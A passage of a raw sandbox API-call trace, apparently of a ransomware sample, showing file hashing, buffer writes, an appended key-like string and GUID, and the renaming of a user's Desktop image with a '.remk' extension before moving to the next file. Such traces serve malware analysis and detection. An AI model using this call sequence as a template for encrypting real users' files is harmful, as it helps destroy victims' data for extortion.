phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.084] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.084] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.084] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.084] GetLastError () returned 0x0 [0231.084] SetLastError (dwErrCode=0x0) [0231.084] GetLastError () returned 0x0 [0231.084] SetLastError (dwErrCode=0x0) [0231.084] GetLastError () returned 0x0 [0231.084] SetLastError (dwErrCode=0x0) [0231.084] GetLastError () returned 0x0 [0231.085] SetLastError (dwErrCode=0x0) [0231.085] GetLastError () returned 0x0 [0231.085] SetLastError (dwErrCode=0x0) [0231.085] GetLastError () returned 0x0 [0231.085] SetLastError (dwErrCode=0x0) [0231.085] GetLastError () returned 0x0 [0231.085] SetLastError (dwErrCode=0x0) [0231.085] GetLastError () returned 0x0 [0231.085] SetLastError (dwErrCode=0x0) [0231.085] GetLastError () returned 0x0 [0231.085] SetLastError (dwErrCode=0x0) [0231.085] GetLastError () returned 0x0 [0231.085] SetLastError (dwErrCode=0x0) [0231.085] GetLastError () returned 0x0 [0231.085] SetLastError (dwErrCode=0x0) [0231.085] GetLastError () returned 0x0 [0231.085] SetLastError (dwErrCode=0x0) [0231.085] GetLastError () returned 0x0 [0231.086] SetLastError (dwErrCode=0x0) [0231.086] GetLastError () returned 0x0 [0231.086] SetLastError (dwErrCode=0x0) [0231.086] GetLastError () returned 0x0 [0231.086] SetLastError (dwErrCode=0x0) [0231.086] GetLastError () returned 0x0 [0231.086] SetLastError (dwErrCode=0x0) [0231.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.086] GetLastError () returned 0x0 [0231.086] SetLastError (dwErrCode=0x0) [0231.086] GetLastError () returned 0x0 [0231.086] SetLastError (dwErrCode=0x0) [0231.086] GetLastError () returned 0x0 [0231.086] SetLastError (dwErrCode=0x0) [0231.086] GetLastError () returned 0x0 [0231.086] SetLastError (dwErrCode=0x0) [0231.086] GetLastError () returned 0x0 [0231.086] SetLastError (dwErrCode=0x0) [0231.086] GetLastError () returned 0x0 [0231.086] SetLastError (dwErrCode=0x0) [0231.087] GetLastError () returned 0x0 [0231.087] SetLastError (dwErrCode=0x0) [0231.087] GetLastError () returned 0x0 [0231.087] SetLastError (dwErrCode=0x0) [0231.087] GetLastError () returned 0x0 [0231.087] SetLastError (dwErrCode=0x0) [0231.087] GetLastError () returned 0x0 [0231.087] SetLastError (dwErrCode=0x0) [0231.087] GetLastError () returned 0x0 [0231.087] SetLastError (dwErrCode=0x0) [0231.087] GetLastError () returned 0x0 [0231.087] SetLastError (dwErrCode=0x0) [0231.087] GetLastError () returned 0x0 [0231.087] SetLastError (dwErrCode=0x0) [0231.087] GetLastError () returned 0x0 [0231.087] SetLastError (dwErrCode=0x0) [0231.087] GetLastError () returned 0x0 [0231.087] SetLastError (dwErrCode=0x0) [0231.087] GetLastError () returned 0x0 [0231.087] SetLastError (dwErrCode=0x0) [0231.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0231.088] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.088] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.088] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.088] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.088] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14500) returned 0x37b1b70 [0231.089] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0231.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0231.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0231.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0231.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7580 [0231.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edbf0 [0231.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b75c8 [0231.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd10 [0231.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc98 [0231.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcf8 [0231.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcb0 [0231.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0231.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x65dd10 [0231.090] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x65dd10, Size=0x218) returned 0x325fd48 [0231.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc98 | out: hHeap=0x630000) returned 1 [0231.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcb0 | out: hHeap=0x630000) returned 1 [0231.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcf8 | out: hHeap=0x630000) returned 1 [0231.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0231.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcf8 [0231.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0231.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edcb0 [0231.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0231.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31edc98 [0231.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0231.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0231.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0231.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0231.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0231.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0231.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcb0 | out: hHeap=0x630000) returned 1 [0231.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc98 | out: hHeap=0x630000) returned 1 [0231.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0231.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcf8 | out: hHeap=0x630000) returned 1 [0231.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0231.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0231.091] GetCurrentThreadId () returned 0x314 [0231.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0231.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x696f88 [0231.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0231.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0231.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0231.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0231.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.091] GetCurrentThreadId () returned 0x314 [0231.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0231.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0231.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0231.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0231.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcf8 [0231.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0231.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0231.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0231.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0231.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0231.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc98 [0231.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0231.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0231.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0231.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0231.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcb0 [0231.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0231.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0231.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0231.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc68 [0231.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0231.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd58 [0231.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0231.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0231.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edce0 [0231.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcc8 [0231.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0231.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edd70 [0231.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcc8 | out: hHeap=0x630000) returned 1 [0231.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edcc8 [0231.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edce0 | out: hHeap=0x630000) returned 1 [0231.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0231.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0231.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0231.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0231.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc98 | out: hHeap=0x630000) returned 1 [0231.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc98 [0231.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0231.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcf8 | out: hHeap=0x630000) returned 1 [0231.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0231.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd70 | out: hHeap=0x630000) returned 1 [0231.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325d6d0 [0231.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0231.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x31b6580 [0231.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0231.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0231.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc98 | out: hHeap=0x630000) returned 1 [0231.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d8e8 [0231.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0231.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0231.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0231.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0231.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0231.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8e8 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcc8 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd58 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcb0 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc68 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd10 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b75c8 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0231.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0231.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.097] WriteFile (in: hFile=0x640, lpBuffer=0x37b1b70*, nNumberOfBytesToWrite=0x144f1, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37b1b70*, lpNumberOfBytesWritten=0x3adfb14*=0x144f1, lpOverlapped=0x0) returned 1 [0231.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b70 | out: hHeap=0x630000) returned 1 [0231.097] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x144f6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.097] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0231.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0231.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0231.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0231.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0231.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0231.098] WriteFile (in: hFile=0x640, lpBuffer=0x325d6d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x325d6d0*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0231.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.098] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.098] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.098] CloseHandle (hObject=0x640) returned 1 [0231.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x37b1b70 [0231.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3dd8 | out: hHeap=0x630000) returned 1 [0231.103] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-ZkT JS.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-zkt js.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-ZkT JS.bmp.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-zkt js.bmp.remk")) returned 1 [0231.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b70 | out: hHeap=0x630000) returned 1 [0231.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.105] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0231.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693330 | out: hHeap=0x630000) returned 1 [0231.106] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56ecaea0, ftCreationTime.dwHighDateTime=0x1d5e08d, ftLastAccessTime.dwLowDateTime=0xd544e6c0, ftLastAccessTime.dwHighDateTime=0x1d5e130, ftLastWriteTime.dwLowDateTime=0xd544e6c0, ftLastWriteTime.dwHighDateTime=0x1d5e130, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0wlw97NT", cAlternateFileName="")) returned 1 [0231.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0231.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dda8 [0231.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e2f0 [0231.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e358 [0231.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325df48 | out: hHeap=0x630000) returned 1 [0231.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e018 | out: hHeap=0x630000) returned 1 [0231.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0231.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0231.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0231.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 